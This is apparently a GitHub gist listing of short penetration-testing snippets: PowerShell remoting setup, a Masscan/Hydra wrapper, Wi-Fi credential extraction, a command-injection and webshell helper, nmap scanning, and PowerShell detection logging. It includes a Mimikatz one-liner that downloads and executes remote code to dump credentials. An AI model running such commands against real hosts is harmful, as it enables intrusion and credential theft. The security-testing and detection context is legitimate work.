Skip to content

Instantly share code, notes, and snippets.

Greg Foss gfoss

Block or report user

Report or block gfoss

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
gfoss / Enable-PSRemoting.ps1
Last active Nov 6, 2019
quickly enable psremoting on Windows Hosts via PowerShell
View Enable-PSRemoting.ps1
function enablePSRemoting {
Enable-PSRemoting –force
Set-Service WinRM -StartMode Automatic
Get-WmiObject -Class win32_service | Where-Object {$ -like "WinRM"}
Set-Item WSMan:localhost\client\trustedhosts -value *
Get-Item WSMan:\localhost\Client\TrustedHosts
gfoss /
Created Aug 3, 2017
Simple Masscan + Hydra wrapper used to perform automated scans by group (organization, unit, team, etc) and generate a report on the results.
# @heinzarelli
# greg . foss [at] logrhythm . com
# v0.1 - May 2017
function usage {
echo ""
gfoss / Extract-WiFi-Creds.ps1
Last active Jan 16, 2020
Simple script to extract locally-stored Wi-Fi Credentials
View Extract-WiFi-Creds.ps1
# Extract Wi-Fi Credentials #
# greg . foss @ owasp . org #
# v0.1 -- July, 2017 #
# Licensed under the MIT License
gfoss / say.ps1
Created May 25, 2017
PowerShell Say
View say.ps1
function say {
param( [string]$comment = $_ )
[Reflection.Assembly]::LoadWithPartialName('System.Speech') | Out-Null
$object = New-Object System.Speech.Synthesis.SpeechSynthesizer
gfoss / Quick-Mimikatz
Last active May 27, 2020
Quick Mimikatz
View Quick-Mimikatz
*NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!*
#mimikatz [local]
IEX (New-Object Net.WebClient).DownloadString(""); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds;
#encoded-mimikatz [local]
gfoss / PowerShell Command Line Logging
Last active Jan 30, 2020
Detect and alert on nefarious PowerShell command line activity
View PowerShell Command Line Logging
# PowerShell Audit Logging for LogRhythm SIEM - 2015
# For detecting dangerous PowerShell Commands/Functions
Log Source Type:
MS Event Log for Win7/Win8/2008/2012 - PowerShell
Add this file to your PowerShell directory to enable verbose command line audit logging
$LogCommandHealthEvent = $true
$LogCommandLifeCycleEvent = $true
View gist:70ae3df90c5a532baaf7
### Keybase proof
I hereby claim:
* I am gfoss on github.
* I am heinzarelli ( on keybase.
* I have a public key whose fingerprint is 3DC9 DCF4 C0A3 7206 C45B 66FB C2DE DD96 D935 5D0E
To claim this, I am signing this object:
gfoss / command injector
Created Sep 10, 2014
script to assist in exploiting command injection vulns / interacting with simple webshells
View command injector
# Command Injector v0.1
# greg.foss[at]
# modified version of dirtshell by 'superkojiman' to exploit command injection vulnerabilities / access web shells via cli
# =>
function usage {
echo "usage: -u URL"
echo "eg : -u \"\""
gfoss /
Last active Jul 20, 2016
Simple script used to set to run automatically via bash script + cronjob, serve up the content and send out e-mail notifications.
# Utilizing LaNMaSteR53's script to auto-scrape web servers and send out notifications.
# Optimized for Kali Linux
# greg.foss[at]
# cronjob to run this script once a week every Sunday at Midnight
# 0 0 * * 0 /usr/share/peepingtom/
# prepare storage location, remove old data, and migrate existing folders
gfoss / nmap-os-detection
Created Aug 28, 2013
OS-detection. Run this nmap command to count OS's and view the os.txt output file to see the results per-system.
View nmap-os-detection
$ sudo nmap -F -O [IP-RANGE] | grep "scan report\|Running: " > os.txt; echo "$(cat os.txt | grep Apple | wc -l) OS X devices"; echo "$(cat os.txt | grep Linux | wc -l) Linux devices"; echo "$(cat os.txt | grep Windows | wc -l) Windows devices"
You can’t perform that action at this time.